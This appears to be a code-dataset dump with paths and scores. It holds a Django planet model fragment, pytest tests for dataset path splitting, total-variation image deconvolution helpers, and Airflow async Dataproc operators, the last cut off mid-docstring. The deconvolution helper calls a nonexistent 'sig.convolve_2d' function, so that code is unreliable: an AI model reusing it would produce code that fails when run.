semi_major_axis = models.FloatField(help_text="Semi-major Axis in au", blank=True, null=True)
revolution = models.FloatField(help_text="Revolutions per earth day", blank=True, null=True)
orbital_period = models.FloatField(help_text="Orbital Period in days", blank=True, null=True)
orbital_eccentricity = models.FloatField(help_text="Orbital Eccentricity", blank=True, null=True)
periastron = models.FloatField(help_text="Degrees of Periastron", blank=True, null=True)
periastron_time = models.FloatField(help_text="Time of Periastron in JD", blank=True, null=True)
velocity_semi_amplitude = models.FloatField(help_text="Semiamplitude of doppler variation", blank=True, null=True)
ring_size = models.FloatField(help_text="Size of rings (as percentage of radius)", blank=True, null=True)
ring_numbers = models.IntegerField(help_text="Number of ring groups", blank=True, null=True)
atmosphere_millibars = models.FloatField(help_text="Pressure of atmosphere in Millibars (Mars=7, Earth=1013.25)", blank=True, null=True)
atmosphere_main_gas = models.CharField(max_length=30, help_text="Major gas (70%), if any", blank=True, null=True)
atmosphere_secondary_gas = models.CharField(max_length=30, help_text="Second gas (20%), if any", blank=True, null=True)
atmosphere_tertiary_gas = models.CharField(max_length=30, help_text="Tertiary gas (9%), if any", blank=True, null=True)
atmosphere_dust_amount = models.FloatField(help_text="Grams of dust/m^2 (Earth=1, Moon=1000, Mars=500)", blank=True, null=True)
surface_wind_speeds_avg = models.FloatField(help_text="Average Wind Speeds in km/hr (Mars=108, Earth=17, Neptune=700)", blank=True, null=True)
surface_wind_speeds_max = models.FloatField(help_text="Max Wind Speeds in km/hr (Mars=288, Earth=400, Neptune=2100)", blank=True, null=True)
other_name = models.CharField(db_index=True, max_length=60, help_text="Alternate Planet Common Name", blank=True, null=True)
parent_star = models.ForeignKey(Star, db_index=True, help_text="The star that it orbits", blank=True, null=True)
parent_planet = models.ForeignKey('self', db_index=True, help_text="A planet that it orbits", blank=True, null=True)
major_features = models.ManyToManyField(PlanetFeature, help_text="What features are significant on this planet", blank=True, null=True)
def __unicode__(self):
name = self.name
if self.other_name:
name = '{0} [{1}]'.format(self.name, self.other_name)
return name
class Meta:
verbose_name_plural = 'Planets (Simulated)'
ordering = ['name']
additional_methods = ['__unicode__', ]
def get_params(self, requested_methods=None, only_variables=None):
"""
Converts parameters to object.
Options:
requested_methods = ['__unicode__', ] (to also call these functions and return results)
only_variables = ['name', 'title', ] (to only return values of these model variables)
"""
additional_methods = self.additional_methods
if requested_methods:
additional_methods = requested_methods + additional_methods
dumps = dict()
if not only_variables:
model_fields = [field.name for field in self._meta.fields]
else:
model_fields = only_variables
for field in model_fields:
dumps[str(field)] = str(self.__getattribute__(field))
for func in additional_methods:
dumps[func] = getattr(self, func)()
return dumps | 0.417034 | 0.216136 |
import pathlib
import tempfile
from ldp.parse import splits
import pytest
@pytest.yield_fixture
def paths():
"""Yields fake (representation, annotation) path pair for testing."""
with tempfile.TemporaryDirectory() as tempdir:
root = pathlib.Path(tempdir)
representations = root / 'train_reps.h5'
representations.touch()
annotations = root / 'train_annotations.conll'
annotations.touch()
yield representations, annotations
def test_ensure(paths):
"""Test ensure returns correct Split tuple."""
representations, annotations = paths
actual = splits.ensure(representations, annotations)
assert actual.representations == representations
assert actual.annotations == annotations
def test_ensure_str_paths(paths):
"""Test ensure returns correct Split tuple when given string paths."""
representations, annotations = paths
actual = splits.ensure(str(representations), str(annotations))
assert actual.representations == representations
assert actual.annotations == annotations
@pytest.mark.parametrize('delete', (0, 1))
def test_ensure_bad_paths(paths, delete):
"""Test ensure explodes when one or more paths does not exist."""
deleted = paths[delete]
deleted.unlink()
with pytest.raises(FileNotFoundError, match=f'.*not found: {deleted}.*'):
splits.ensure(*paths)
@pytest.fixture
def representations_by_split(paths):
"""Returns dict mapping split key to fake representations paths."""
train_reps, _ = paths
test_reps = train_reps.parent / 'test_reps.h5'
test_reps.touch()
return {splits.TRAIN: train_reps, splits.TEST: test_reps}
@pytest.fixture
def annotations_by_split(paths):
"""Returns dict mapping split key to fake annotation paths."""
_, train_annotations = paths
test_annotations = train_annotations.parent / 'test_annotations.conll'
test_annotations.touch()
return {splits.TRAIN: train_annotations, splits.TEST: test_annotations}
def test_join(representations_by_split, annotations_by_split):
"""Test join produces correct splits in basic case."""
actual = splits.join(representations_by_split, annotations_by_split)
assert actual.keys() == {splits.TRAIN, splits.TEST}
for key in (splits.TRAIN, splits.TEST):
split = actual[key]
assert split.representations == representations_by_split[key]
assert split.annotations == annotations_by_split[key]
def test_join_no_validate(representations_by_split, annotations_by_split):
"""Test join produces correct splits even when it does not validate."""
representations_by_split[splits.TRAIN].unlink()
actual = splits.join(representations_by_split,
annotations_by_split,
validate=False)
assert actual.keys() == {splits.TRAIN, splits.TEST}
for key in (splits.TRAIN, splits.TEST):
split = actual[key]
assert split.representations == representations_by_split[key]
assert split.annotations == annotations_by_split[key]
@pytest.mark.parametrize('validate', (True, False))
def test_join_mismatched_keys(representations_by_split, annotations_by_split,
validate):
"""Test join dies when reps/anno dictionaries have different keys."""
del representations_by_split[splits.TRAIN]
with pytest.raises(ValueError, match='reps have splits.*'):
splits.join(representations_by_split,
annotations_by_split,
validate=validate)
def test_join_with_root(representations_by_split, annotations_by_split):
"""Test join adjusts paths correctly when given root."""
root = representations_by_split[splits.TRAIN].parent
for key in (splits.TRAIN, splits.TEST):
representations_by_split[key] = representations_by_split[key].name
annotations_by_split[key] = annotations_by_split[key].name
actual = splits.join(representations_by_split,
annotations_by_split,
root=root)
assert actual.keys() == {splits.TRAIN, splits.TEST}
for key in (splits.TRAIN, splits.TEST):
split = actual[key]
assert split.representations == root / representations_by_split[key]
assert split.annotations == root / annotations_by_split[key]
def test_join_bad_root(representations_by_split, annotations_by_split):
"""Test join validates root when validate=True."""
root = 'fake!'
with pytest.raises(FileNotFoundError, match=f'.*root {root}.*'):
splits.join(representations_by_split, annotations_by_split, root=root)
def test_join_bad_root_no_validate():
"""Test join does not die when given bad root and validate=False."""
root = pathlib.Path('root')
reps = pathlib.Path('train.h5')
annos = pathlib.Path('annotations.h5')
actual = splits.join({splits.TRAIN: reps}, {splits.TRAIN: annos},
root=root,
validate=False)
assert actual == {splits.TRAIN: splits.Split(root / reps, root / annos)} | tests/parse/splits_test.py | import pathlib
import tempfile
from ldp.parse import splits
import pytest
@pytest.yield_fixture
def paths():
"""Yields fake (representation, annotation) path pair for testing."""
with tempfile.TemporaryDirectory() as tempdir:
root = pathlib.Path(tempdir)
representations = root / 'train_reps.h5'
representations.touch()
annotations = root / 'train_annotations.conll'
annotations.touch()
yield representations, annotations
def test_ensure(paths):
"""Test ensure returns correct Split tuple."""
representations, annotations = paths
actual = splits.ensure(representations, annotations)
assert actual.representations == representations
assert actual.annotations == annotations
def test_ensure_str_paths(paths):
"""Test ensure returns correct Split tuple when given string paths."""
representations, annotations = paths
actual = splits.ensure(str(representations), str(annotations))
assert actual.representations == representations
assert actual.annotations == annotations
@pytest.mark.parametrize('delete', (0, 1))
def test_ensure_bad_paths(paths, delete):
"""Test ensure explodes when one or more paths does not exist."""
deleted = paths[delete]
deleted.unlink()
with pytest.raises(FileNotFoundError, match=f'.*not found: {deleted}.*'):
splits.ensure(*paths)
@pytest.fixture
def representations_by_split(paths):
"""Returns dict mapping split key to fake representations paths."""
train_reps, _ = paths
test_reps = train_reps.parent / 'test_reps.h5'
test_reps.touch()
return {splits.TRAIN: train_reps, splits.TEST: test_reps}
@pytest.fixture
def annotations_by_split(paths):
"""Returns dict mapping split key to fake annotation paths."""
_, train_annotations = paths
test_annotations = train_annotations.parent / 'test_annotations.conll'
test_annotations.touch()
return {splits.TRAIN: train_annotations, splits.TEST: test_annotations}
def test_join(representations_by_split, annotations_by_split):
"""Test join produces correct splits in basic case."""
actual = splits.join(representations_by_split, annotations_by_split)
assert actual.keys() == {splits.TRAIN, splits.TEST}
for key in (splits.TRAIN, splits.TEST):
split = actual[key]
assert split.representations == representations_by_split[key]
assert split.annotations == annotations_by_split[key]
def test_join_no_validate(representations_by_split, annotations_by_split):
"""Test join produces correct splits even when it does not validate."""
representations_by_split[splits.TRAIN].unlink()
actual = splits.join(representations_by_split,
annotations_by_split,
validate=False)
assert actual.keys() == {splits.TRAIN, splits.TEST}
for key in (splits.TRAIN, splits.TEST):
split = actual[key]
assert split.representations == representations_by_split[key]
assert split.annotations == annotations_by_split[key]
@pytest.mark.parametrize('validate', (True, False))
def test_join_mismatched_keys(representations_by_split, annotations_by_split,
validate):
"""Test join dies when reps/anno dictionaries have different keys."""
del representations_by_split[splits.TRAIN]
with pytest.raises(ValueError, match='reps have splits.*'):
splits.join(representations_by_split,
annotations_by_split,
validate=validate)
def test_join_with_root(representations_by_split, annotations_by_split):
"""Test join adjusts paths correctly when given root."""
root = representations_by_split[splits.TRAIN].parent
for key in (splits.TRAIN, splits.TEST):
representations_by_split[key] = representations_by_split[key].name
annotations_by_split[key] = annotations_by_split[key].name
actual = splits.join(representations_by_split,
annotations_by_split,
root=root)
assert actual.keys() == {splits.TRAIN, splits.TEST}
for key in (splits.TRAIN, splits.TEST):
split = actual[key]
assert split.representations == root / representations_by_split[key]
assert split.annotations == root / annotations_by_split[key]
def test_join_bad_root(representations_by_split, annotations_by_split):
"""Test join validates root when validate=True."""
root = 'fake!'
with pytest.raises(FileNotFoundError, match=f'.*root {root}.*'):
splits.join(representations_by_split, annotations_by_split, root=root)
def test_join_bad_root_no_validate():
"""Test join does not die when given bad root and validate=False."""
root = pathlib.Path('root')
reps = pathlib.Path('train.h5')
annos = pathlib.Path('annotations.h5')
actual = splits.join({splits.TRAIN: reps}, {splits.TRAIN: annos},
root=root,
validate=False)
assert actual == {splits.TRAIN: splits.Split(root / reps, root / annos)} | 0.770119 | 0.731754 |
__author__ = '<NAME>'
__email__ = '<EMAIL>'
import numpy as np
import scipy.signal as sig
from skimage.filters import gaussian
from tv_fista import deconvolve_fista
def deconvolve_tv(image, psf, noise_level=0.05, min_value=0, max_value=1,
intermediate_it=30, it=40, intermediate_eps=1e-3, eps=1e-5):
"""Computes the total variation regularized deconvolution of a given image,
with the point spread function psf. This is computed using the FISTA
method [2] and the framework derived in [3].
:param image: Image to deconvolve.
:param psf: Point spread function to invert.
:param noise_level: Regularization parameter, higher means noisier data.
:param min_value: Minimum pixel intensity.
:param max_value: Maximum pixel intensity.
:param intermediate_it: Iterations per proximal gradient computation.
:param it: No. of FISTA iterations.
:param intermediate_eps: Convergence level of proximal gradient computation.
:param eps: Convergence level deconvolution iterations.
:returns: Deconvoluted image.
"""
psf_adjoint = np.rot90(psf, 2)
filter = lambda x: sig.convolve_2d(x, psf, mode='same')
adjoint_filter = lambda x: sig.convolve_2d(x, psf_adjoint, mode='same')
return deconvolve_fista(image, filter, adjoint_filter, noise_level,
it=it, intermediate_it=intermediate_it, eps=eps,
intermediate_eps=intermediate_eps,
min_value=min_value, max_value=max_value,
lipschitz=find_lipschitz(image,
lambda x: adjoint_filter(filter(x))))
def easy_gaussian_denoise(image, std, noise_level=0.05, min_value=0,
max_value=1, intermediate_it=30, it=40,
intermediate_eps=1e-3, eps=1e-5, lipschitz=None,
message=True):
"""Warning: Slow! Each iteration performs total variation deblurring.
Performs total variation regularized deconvolution of image with a
gaussian blurring kernel that has given standard deviation. This is
performed using the FISTA method [2] and the framework derived in [3] as
well as a restarting scheme as described in [4].
:param image: Image to deblur.
:param std: Standard deviation (radius) of the gaussian blurring kernel
to invert.
:param noise_level: Regularization parameter - Almost always less than 1.
:param min_value: Minimum pixel value.
:param max_value: Maximum pixel value.
:param intermediate_it: Iterations per proximal gradient computation.
:param it: No. of FISTA iterations.
:param intermediate_eps: Convergence level of proximal gradient computation.
:param eps: Convergence level deconvolution iterations.
:param lipschitz: Use higher than standard Lipschitz bound for the
convolution gradient funcitonal.
:param message: Show information during iterations
:return: Deblurred image
"""
lipschitz = 2 if not lipschitz else lipschitz
filter = lambda x: gaussian(x, std)
return deconvolve_fista(image, filter, filter, noise_level,
it=it, intermediate_it=intermediate_it, eps=eps,
intermediate_eps=intermediate_eps,
min_value=min_value, max_value=max_value,
lipschitz=lipschitz, message=message)
def find_lipschitz(x0, operator):
"""Use power iterations to find the Lipschitz constant of a linear
operator O: V -> V. To find the Lipschitz constant for the gradient of:
||Ax - b||,
with linear operator A, constant vector b and variable x, one has to
compute the Lipschitz constant of the operator [A'A].
:param x0: Initial vector x0.
:param operator: Function that corresponds to the operator, takes one
vector as argument and returns a vector of the same size.
:returns: Lipschitz constant of the operator, returns 1.1 if the
Lipschitz constant is less than 1.1 (for stability reasons)."""
x0 = np.copy(x0)
lip = np.linalg.norm(x0)
for i in range(20):
x0 /= lip
x0 = operator(x0)
lip = np.linalg.norm(x0)
return lip if lip > 1.1 else 1.1 | improve/easy_deconvolve.py | __author__ = '<NAME>'
__email__ = '<EMAIL>'
import numpy as np
import scipy.signal as sig
from skimage.filters import gaussian
from tv_fista import deconvolve_fista
def deconvolve_tv(image, psf, noise_level=0.05, min_value=0, max_value=1,
intermediate_it=30, it=40, intermediate_eps=1e-3, eps=1e-5):
"""Computes the total variation regularized deconvolution of a given image,
with the point spread function psf. This is computed using the FISTA
method [2] and the framework derived in [3].
:param image: Image to deconvolve.
:param psf: Point spread function to invert.
:param noise_level: Regularization parameter, higher means noisier data.
:param min_value: Minimum pixel intensity.
:param max_value: Maximum pixel intensity.
:param intermediate_it: Iterations per proximal gradient computation.
:param it: No. of FISTA iterations.
:param intermediate_eps: Convergence level of proximal gradient computation.
:param eps: Convergence level deconvolution iterations.
:returns: Deconvoluted image.
"""
psf_adjoint = np.rot90(psf, 2)
filter = lambda x: sig.convolve_2d(x, psf, mode='same')
adjoint_filter = lambda x: sig.convolve_2d(x, psf_adjoint, mode='same')
return deconvolve_fista(image, filter, adjoint_filter, noise_level,
it=it, intermediate_it=intermediate_it, eps=eps,
intermediate_eps=intermediate_eps,
min_value=min_value, max_value=max_value,
lipschitz=find_lipschitz(image,
lambda x: adjoint_filter(filter(x))))
def easy_gaussian_denoise(image, std, noise_level=0.05, min_value=0,
max_value=1, intermediate_it=30, it=40,
intermediate_eps=1e-3, eps=1e-5, lipschitz=None,
message=True):
"""Warning: Slow! Each iteration performs total variation deblurring.
Performs total variation regularized deconvolution of image with a
gaussian blurring kernel that has given standard deviation. This is
performed using the FISTA method [2] and the framework derived in [3] as
well as a restarting scheme as described in [4].
:param image: Image to deblur.
:param std: Standard deviation (radius) of the gaussian blurring kernel
to invert.
:param noise_level: Regularization parameter - Almost always less than 1.
:param min_value: Minimum pixel value.
:param max_value: Maximum pixel value.
:param intermediate_it: Iterations per proximal gradient computation.
:param it: No. of FISTA iterations.
:param intermediate_eps: Convergence level of proximal gradient computation.
:param eps: Convergence level deconvolution iterations.
:param lipschitz: Use higher than standard Lipschitz bound for the
convolution gradient funcitonal.
:param message: Show information during iterations
:return: Deblurred image
"""
lipschitz = 2 if not lipschitz else lipschitz
filter = lambda x: gaussian(x, std)
return deconvolve_fista(image, filter, filter, noise_level,
it=it, intermediate_it=intermediate_it, eps=eps,
intermediate_eps=intermediate_eps,
min_value=min_value, max_value=max_value,
lipschitz=lipschitz, message=message)
def find_lipschitz(x0, operator):
"""Use power iterations to find the Lipschitz constant of a linear
operator O: V -> V. To find the Lipschitz constant for the gradient of:
||Ax - b||,
with linear operator A, constant vector b and variable x, one has to
compute the Lipschitz constant of the operator [A'A].
:param x0: Initial vector x0.
:param operator: Function that corresponds to the operator, takes one
vector as argument and returns a vector of the same size.
:returns: Lipschitz constant of the operator, returns 1.1 if the
Lipschitz constant is less than 1.1 (for stability reasons)."""
x0 = np.copy(x0)
lip = np.linalg.norm(x0)
for i in range(20):
x0 /= lip
x0 = operator(x0)
lip = np.linalg.norm(x0)
return lip if lip > 1.1 else 1.1 | 0.891964 | 0.716913 |
import time
from typing import Any, Dict, Optional
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.dataproc import DataprocHook
from airflow.providers.google.cloud.links.dataproc import (
DATAPROC_CLUSTER_LINK,
DataprocLink,
)
from airflow.providers.google.cloud.operators.dataproc import (
DataprocCreateClusterOperator,
DataprocDeleteClusterOperator,
DataprocSubmitJobOperator,
DataprocUpdateClusterOperator,
)
from airflow.utils.context import Context
from google.api_core.exceptions import AlreadyExists
from astronomer.providers.google.cloud.triggers.dataproc import (
DataprocCreateClusterTrigger,
DataprocDeleteClusterTrigger,
DataProcSubmitTrigger,
)
class DataprocCreateClusterOperatorAsync(DataprocCreateClusterOperator):
"""
Create a new cluster on Google Cloud Dataproc Asynchronously.
:param project_id: The ID of the google cloud project in which
to create the cluster. (templated)
:param cluster_name: Name of the cluster to create
:param labels: Labels that will be assigned to created cluster
:param cluster_config: Required. The cluster config to create.
If a dict is provided, it must be of the same form as the protobuf message
:class:`~google.cloud.dataproc_v1.types.ClusterConfig`
:param virtual_cluster_config: Optional. The virtual cluster config, used when creating a Dataproc
cluster that does not directly control the underlying compute resources, for example, when creating a
`Dataproc-on-GKE cluster
<https://cloud.google.com/dataproc/docs/concepts/jobs/dataproc-gke#create-a-dataproc-on-gke-cluster>`
:param region: The specified region where the dataproc cluster is created.
:param delete_on_error: If true the cluster will be deleted if created with ERROR state. Default
value is true.
:param use_if_exists: If true use existing cluster
:param request_id: Optional. A unique id used to identify the request. If the server receives two
``DeleteClusterRequest`` requests with the same id, then the second request will be ignored and the
first ``google.longrunning.Operation`` created and stored in the backend is returned.
:param retry: A retry object used to retry requests. If ``None`` is specified, requests will not be
retried.
:param timeout: The amount of time, in seconds, to wait for the request to complete. Note that if
``retry`` is specified, the timeout applies to each individual attempt.
:param metadata: Additional metadata that is provided to the method.
:param gcp_conn_id: The connection ID to use connecting to Google Cloud.
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:param polling_interval: Time in seconds to sleep between checks of cluster status
"""
def __init__(
self,
*,
polling_interval: float = 5.0,
**kwargs: Any,
):
super().__init__(**kwargs)
self.polling_interval = polling_interval
def execute(self, context: Context) -> None: # type: ignore[override]
"""Call create cluster API and defer to DataprocCreateClusterTrigger to check the status"""
hook = DataprocHook(gcp_conn_id=self.gcp_conn_id)
DataprocLink.persist(
context=context, task_instance=self, url=DATAPROC_CLUSTER_LINK, resource=self.cluster_name
)
try:
hook.create_cluster(
region=self.region,
project_id=self.project_id,
cluster_name=self.cluster_name,
cluster_config=self.cluster_config,
labels=self.labels,
request_id=self.request_id,
retry=self.retry,
timeout=self.timeout,
metadata=self.metadata,
)
except AlreadyExists:
if not self.use_if_exists:
raise
self.log.info("Cluster already exists.")
end_time: float = time.monotonic() + self.timeout
self.defer(
trigger=DataprocCreateClusterTrigger(
project_id=self.project_id,
region=self.region,
cluster_name=self.cluster_name,
end_time=end_time,
metadata=self.metadata,
delete_on_error=self.delete_on_error,
cluster_config=self.cluster_config,
labels=self.labels,
gcp_conn_id=self.gcp_conn_id,
polling_interval=self.polling_interval,
),
method_name="execute_complete",
)
def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, Any]] = None) -> Any:
"""
Callback for when the trigger fires - returns immediately.
Relies on trigger to throw an exception, otherwise it assumes execution was
successful.
"""
if event and event["status"] == "success":
self.log.info("Cluster created successfully \n %s", event["data"])
return event["data"]
elif event and event["status"] == "error":
raise AirflowException(event["message"])
raise AirflowException("No event received in trigger callback")
class DataprocDeleteClusterOperatorAsync(DataprocDeleteClusterOperator):
"""
Delete a cluster on Google Cloud Dataproc Asynchronously.
:param region: Required. The Cloud Dataproc region in which to handle the request (templated).
:param cluster_name: Required. The cluster name (templated).
:param project_id: Optional. The ID of the Google Cloud project that the cluster belongs to (templated).
:param cluster_uuid: Optional. Specifying the ``cluster_uuid`` means the RPC should fail
if cluster with specified UUID does not exist.
:param request_id: Optional. A unique id used to identify the request. If the server receives two
``DeleteClusterRequest`` requests with the same id, then the second request will be ignored and the
first ``google.longrunning.Operation`` created and stored in the backend is returned.
:param retry: A retry object used to retry requests. If ``None`` is specified, requests will not be
retried.
:param timeout: The amount of time, in seconds, to wait for the request to complete. Note that if
``retry`` is specified, the timeout applies to each individual attempt.
:param metadata: Additional metadata that is provided to the method.
:param gcp_conn_id: The connection ID to use connecting to Google Cloud.
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:param polling_interval: Time in seconds to sleep between checks of cluster status
"""
def __init__(
self,
*,
polling_interval: float = 5.0,
**kwargs: Any,
):
super().__init__(**kwargs)
self.polling_interval = polling_interval
if self.timeout is None:
self.timeout: float = 24 * 60 * 60
def execute(self, context: "Context") -> None:
"""Call delete cluster API and defer to wait for cluster to completely deleted"""
hook = DataprocHook(gcp_conn_id=self.gcp_conn_id, impersonation_chain=self.impersonation_chain)
self.log.info("Deleting cluster: %s", self.cluster_name)
hook.delete_cluster(
project_id=self.project_id,
region=self.region,
cluster_name=self.cluster_name,
cluster_uuid=self.cluster_uuid,
request_id=self.request_id,
retry=self.retry,
metadata=self.metadata,
)
end_time: float = time.monotonic() + self.timeout
self.defer(
trigger=DataprocDeleteClusterTrigger(
project_id=self.project_id,
region=self.region,
cluster_name=self.cluster_name,
request_id=self.request_id,
retry=self.retry,
end_time=end_time,
metadata=self.metadata,
),
method_name="execute_complete",
)
def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, Any]] = None) -> Any:
"""
Callback for when the trigger fires - returns immediately.
Relies on trigger to throw an exception, otherwise it assumes execution was
successful.
"""
if event and event["status"] == "error":
raise AirflowException(event["message"])
elif event is None:
raise AirflowException("No event received in trigger callback")
self.log.info("Cluster deleted.")
class DataprocSubmitJobOperatorAsync(DataprocSubmitJobOperator):
"""
Submits a job to a cluster and wait until is completely finished or any error occurs.
:param project_id: Optional. The ID of the Google Cloud project that the job belongs to.
:param region: Required. The Cloud Dataproc region in which to handle the request.
:param job: Required. The job resource.
If a dict is provided, it must be of the same form as the protobuf message
class:`~google.cloud.dataproc_v1.types.Job`
:param request_id: Optional. A unique id used to identify the request. If the server receives two
``SubmitJobRequest`` requests with the same id, then the second request will be ignored and the first
``Job`` created and stored in the backend is returned.
It is recommended to always set this value to a UUID.
:param retry: A retry object used to retry requests. If ``None`` is specified, requests will not be
retried.
:param timeout: The amount of time, in seconds, to wait for the request to complete. Note that if
``retry`` is specified, the timeout applies to each individual attempt.
:param metadata: Additional metadata that is provided to the method.
:param gcp_conn_id: The connection ID to use connecting to Google Cloud Platform.
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:param cancel_on_kill: Flag which indicates whether cancel the hook's job or not, when on_kill is called
"""
def execute(self, context: "Context") -> None:
"""
Airflow runs this method on the worker and defers using the trigger.
Submit the job and get the job_id using which we defer and poll in trigger
"""
self.log.info("Submitting job \n %s", self.job)
self.hook = DataprocHook(gcp_conn_id=self.gcp_conn_id, impersonation_chain=self.impersonation_chain)
job_object = self.hook.submit_job(
project_id=self.project_id,
region=self.region,
job=self.job,
request_id=self.request_id,
retry=self.retry,
timeout=self.timeout,
metadata=self.metadata,
)
job_id = job_object.reference.job_id
self.log.info("Job %s submitted successfully.", job_id)
self.job_id = job_id
self.defer(
timeout=self.execution_timeout,
trigger=DataProcSubmitTrigger(
gcp_conn_id=self.gcp_conn_id,
dataproc_job_id=job_id,
project_id=self.project_id,
region=self.region,
),
method_name="execute_complete",
)
def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, str]] = None) -> str:
"""
Callback for when the trigger fires - returns immediately.
Relies on trigger to throw an exception, otherwise it assumes execution was
successful.
"""
if event:
if event["status"] == "success":
self.log.info("Job %s completed successfully.", event["job_id"])
return event["job_id"]
raise AirflowException(event["message"])
raise AirflowException("No event received in trigger callback")
class DataprocUpdateClusterOperatorAsync(DataprocUpdateClusterOperator):
"""
Updates an existing cluster in a Google cloud platform project.
:param region: Required. The Cloud Dataproc region in which to handle the request.
:param project_id: Optional. The ID of the Google Cloud project the cluster belongs to.
:param cluster_name: Required. The cluster name.
:param cluster: Required. The changes to the cluster.
If a dict is provided, it must be of the same form as the protobuf message
:class:`~google.cloud.dataproc_v1.types.Cluster`
:param update_mask: Required. Specifies the path, relative to ``Cluster``, of the field to update. For
example, to change the number of workers in a cluster to 5, the ``update_mask`` parameter would be
specified as ``config.worker_config.num_instances``, and the ``PATCH`` request body would specify the
new value. If a dict is provided, it must be of the same form as the protobuf message
:class:`~google.protobuf.field_mask_pb2.FieldMask`
:param graceful_decommission_timeout: Optional. Timeout for graceful YARN decommissioning. Graceful
decommissioning allows removing nodes from the cluster without interrupting jobs in progress. Timeout
specifies how long to wait for jobs in progress to finish before forcefully removing nodes (and
potentially interrupting jobs). Default timeout is 0 (for forceful decommission), and the maximum
allowed timeout is 1 day.
:param request_id: Optional. A unique id used to identify the request. If the server receives two
``UpdateClusterRequest`` requests with the same id, then the second request will be ignored and the
first ``google.longrunning.Operation`` created and stored in the backend is returned.
:param retry: A retry object used to retry requests. If ``None`` is specified, requests will not be
retried.
:param timeout: The amount of time, in seconds, to wait for the request to complete. Note that if
``retry`` is specified, the timeout applies to each individual attempt.
:param metadata: Additional metadata that is provided to the method.
:param gcp_conn_id: The connection ID to use connecting to Google Cloud.
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:param polling_interval: Time in seconds to sleep between checks of cluster status
"""
def __init__(
self,
*,
polling_interval: float = 5.0,
**kwargs: Any,
):
super().__init__(**kwargs)
self.polling_interval = polling_interval
if self.timeout is None:
self.timeout: float = 24 * 60 * 60
def execute(self, context: "Context") -> None:
"""Call update cluster API and defer to wait for cluster update to complete"""
hook = DataprocHook(gcp_conn_id=self.gcp_conn_id, impersonation_chain=self.impersonation_chain)
# Save data required by extra links no matter what the cluster status will be
DataprocLink.persist(
context=context, task_instance=self, url=DATAPROC_CLUSTER_LINK, resource=self.cluster_name
)
self.log.info("Updating %s cluster.", self.cluster_name)
hook.update_cluster(
project_id=self.project_id,
region=self.region,
cluster_name=self.cluster_name,
cluster=self.cluster,
update_mask=self.update_mask,
graceful_decommission_timeout=self.graceful_decommission_timeout,
request_id=self.request_id,
retry=self.retry,
metadata=self.metadata,
)
end_time: float = time.monotonic() + self.timeout
self.defer(
trigger=DataprocCreateClusterTrigger(
project_id=self.project_id,
region=self.region,
cluster_name=self.cluster_name,
end_time=end_time,
metadata=self.metadata,
gcp_conn_id=self.gcp_conn_id,
polling_interval=self.polling_interval,
),
method_name="execute_complete",
)
def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, Any]] = None) -> Any:
"""
Callback for when the trigger fires - returns immediately.
Relies on trigger to throw an exception, otherwise it assumes execution was
successful.
"""
if event and event["status"] == "success":
self.log.info("Updated %s cluster.", event["cluster_name"])
return
if event and event["status"] == "error":
raise AirflowException(event["message"])
raise AirflowException("No event received in trigger callback") | astronomer/providers/google/cloud/operators/dataproc.py | import time
from typing import Any, Dict, Optional
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.dataproc import DataprocHook
from airflow.providers.google.cloud.links.dataproc import (
DATAPROC_CLUSTER_LINK,
DataprocLink,
)
from airflow.providers.google.cloud.operators.dataproc import (
DataprocCreateClusterOperator,
DataprocDeleteClusterOperator,
DataprocSubmitJobOperator,
DataprocUpdateClusterOperator,
)
from airflow.utils.context import Context
from google.api_core.exceptions import AlreadyExists
from astronomer.providers.google.cloud.triggers.dataproc import (
DataprocCreateClusterTrigger,
DataprocDeleteClusterTrigger,
DataProcSubmitTrigger,
)
class DataprocCreateClusterOperatorAsync(DataprocCreateClusterOperator):
"""
Create a new cluster on Google Cloud Dataproc Asynchronously.
:param project_id: The ID of the google cloud project in which
to create the cluster. (templated)
:param cluster_name: Name of the cluster to create
:param labels: Labels that will be assigned to created cluster
:param cluster_config: Required. The cluster config to create.
If a dict is provided, it must be of the same form as the protobuf message
:class:`~google.cloud.dataproc_v1.types.ClusterConfig`
:param virtual_cluster_config: Optional. The virtual cluster config, used when creating a Dataproc
cluster that does not directly control the underlying compute resources, for example, when creating a
`Dataproc-on-GKE cluster
<https://cloud.google.com/dataproc/docs/concepts/jobs/dataproc-gke#create-a-dataproc-on-gke-cluster>`
:param region: The specified region where the dataproc cluster is created.
:param delete_on_error: If true the cluster will be deleted if created with ERROR state. Default
value is true.
:param use_if_exists: If true use existing cluster
:param request_id: Optional. A unique id used to identify the request. If the server receives two
``DeleteClusterRequest`` requests with the same id, then the second request will be ignored and the
first ``google.longrunning.Operation`` created and stored in the backend is returned.
:param retry: A retry object used to retry requests. If ``None`` is specified, requests will not be
retried.
:param timeout: The amount of time, in seconds, to wait for the request to complete. Note that if
``retry`` is specified, the timeout applies to each individual attempt.
:param metadata: Additional metadata that is provided to the method.
:param gcp_conn_id: The connection ID to use connecting to Google Cloud.
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
